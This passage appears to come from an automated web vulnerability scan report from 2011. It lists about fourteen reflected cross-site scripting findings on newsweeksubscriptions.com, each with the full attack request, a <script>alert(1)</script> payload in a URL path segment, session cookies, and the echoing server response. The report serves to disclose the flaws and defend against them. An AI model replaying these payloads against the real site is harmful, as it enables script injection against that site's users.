Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.com/Netsparker37c19d3edd97406aa7aeff8e0b4b88589122d<script>alert(1)</script>09ba830a907 is not found !</p>
...[SNIP]...

1.265. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker88468e5892914e859ede199ce9b7be76/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/Netsparker88468e5892914e859ede199ce9b7be76/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 17bb3<script>alert(1)</script>207e559fe6f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol17bb3<script>alert(1)</script>207e559fe6f/www.newsweek.com/Netsparker88468e5892914e859ede199ce9b7be76/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:00 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 581
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol17bb3<script>alert(1)</script>207e559fe6f/www.newsweek.com/Netsparker88468e5892914e859ede199ce9b7be76 is not found !</p>
...[SNIP]...

1.266. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker88468e5892914e859ede199ce9b7be76/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/Netsparker88468e5892914e859ede199ce9b7be76/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a1228<script>alert(1)</script>05badbafcb3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/www.newsweek.coma1228<script>alert(1)</script>05badbafcb3/Netsparker88468e5892914e859ede199ce9b7be76/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:04 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 833
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.coma1228<script>alert(1)</script>05badbafcb3/Netsparker88468e5892914e859ede199ce9b7be76 is not found !</p>
...[SNIP]...

1.267. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker88468e5892914e859ede199ce9b7be76/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/Netsparker88468e5892914e859ede199ce9b7be76/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 802b7<script>alert(1)</script>8e9e3a08594 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/www.newsweek.com/Netsparker88468e5892914e859ede199ce9b7be76802b7<script>alert(1)</script>8e9e3a08594/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:10 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 833
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.com/Netsparker88468e5892914e859ede199ce9b7be76802b7<script>alert(1)</script>8e9e3a08594 is not found !</p>
...[SNIP]...

1.268. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparkera4a3dcc1dec5482fa45c61e8ff59fecd [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/Netsparkera4a3dcc1dec5482fa45c61e8ff59fecd

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c51f4<script>alert(1)</script>0b5bae7fa37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrolc51f4<script>alert(1)</script>0b5bae7fa37/www.newsweek.com/Netsparkera4a3dcc1dec5482fa45c61e8ff59fecd HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:02 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 581
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrolc51f4<script>alert(1)</script>0b5bae7fa37/www.newsweek.com/Netsparkera4a3dcc1dec5482fa45c61e8ff59fecd is not found !</p>
...[SNIP]...

1.269. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparkera4a3dcc1dec5482fa45c61e8ff59fecd [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/Netsparkera4a3dcc1dec5482fa45c61e8ff59fecd

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 89ec4<script>alert(1)</script>4f52d45b46a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/www.newsweek.com89ec4<script>alert(1)</script>4f52d45b46a/Netsparkera4a3dcc1dec5482fa45c61e8ff59fecd HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:16 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 833
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.com89ec4<script>alert(1)</script>4f52d45b46a/Netsparkera4a3dcc1dec5482fa45c61e8ff59fecd is not found !</p>
...[SNIP]...

1.270. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparkera4a3dcc1dec5482fa45c61e8ff59fecd [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/Netsparkera4a3dcc1dec5482fa45c61e8ff59fecd

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 75edc<script>alert(1)</script>0f6f3d15d21 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/www.newsweek.com/Netsparkera4a3dcc1dec5482fa45c61e8ff59fecd75edc<script>alert(1)</script>0f6f3d15d21 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:25 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 833
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.com/Netsparkera4a3dcc1dec5482fa45c61e8ff59fecd75edc<script>alert(1)</script>0f6f3d15d21 is not found !</p>
...[SNIP]...

1.271. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparkerc5772a1335634287a05ff399d29aa45b [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/Netsparkerc5772a1335634287a05ff399d29aa45b

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7eb58<script>alert(1)</script>a377b4fed97 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol7eb58<script>alert(1)</script>a377b4fed97/www.newsweek.com/Netsparkerc5772a1335634287a05ff399d29aa45b HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:14 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 581
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol7eb58<script>alert(1)</script>a377b4fed97/www.newsweek.com/Netsparkerc5772a1335634287a05ff399d29aa45b is not found !</p>
...[SNIP]...

1.272. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparkerc5772a1335634287a05ff399d29aa45b [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/Netsparkerc5772a1335634287a05ff399d29aa45b

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d9525<script>alert(1)</script>f384005f20b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/www.newsweek.comd9525<script>alert(1)</script>f384005f20b/Netsparkerc5772a1335634287a05ff399d29aa45b HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:25 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 833
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.comd9525<script>alert(1)</script>f384005f20b/Netsparkerc5772a1335634287a05ff399d29aa45b is not found !</p>
...[SNIP]...

1.273. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparkerc5772a1335634287a05ff399d29aa45b [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/Netsparkerc5772a1335634287a05ff399d29aa45b

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1a02e<script>alert(1)</script>e7fa99c21a6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/www.newsweek.com/Netsparkerc5772a1335634287a05ff399d29aa45b1a02e<script>alert(1)</script>e7fa99c21a6 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:31 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 833
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.com/Netsparkerc5772a1335634287a05ff399d29aa45b1a02e<script>alert(1)</script>e7fa99c21a6 is not found !</p>
...[SNIP]...

1.274. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/privacy

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 89a25<script>alert(1)</script>80c78a8f7aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol89a25<script>alert(1)</script>80c78a8f7aa/www.newsweek.com/privacy HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:02 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 546
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol89a25<script>alert(1)</script>80c78a8f7aa/www.newsweek.com/privacy is not found !</p>
...[SNIP]...

1.275. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/privacy

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fe960<script>alert(1)</script>44bcae49233 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/www.newsweek.comfe960<script>alert(1)</script>44bcae49233/privacy HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:23 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 798
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.comfe960<script>alert(1)</script>44bcae49233/privacy is not found !</p>
...[SNIP]...

1.276. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/privacy

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fc74a<script>alert(1)</script>12c67a688c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/www.newsweek.com/privacyfc74a<script>alert(1)</script>12c67a688c5 HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:38 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 798
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.com/privacyfc74a<script>alert(1)</script>12c67a688c5 is not found !</p>
...[SNIP]...

1.277. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/privacy/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eda7e<script>alert(1)</script>db98fef540b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontroleda7e<script>alert(1)</script>db98fef540b/www.newsweek.com/privacy/ HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:25 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 546
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontroleda7e<script>alert(1)</script>db98fef540b/www.newsweek.com/privacy is not found !</p>
...[SNIP]...

1.278. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/privacy/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 64bc7<script>alert(1)</script>bda86d52164 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

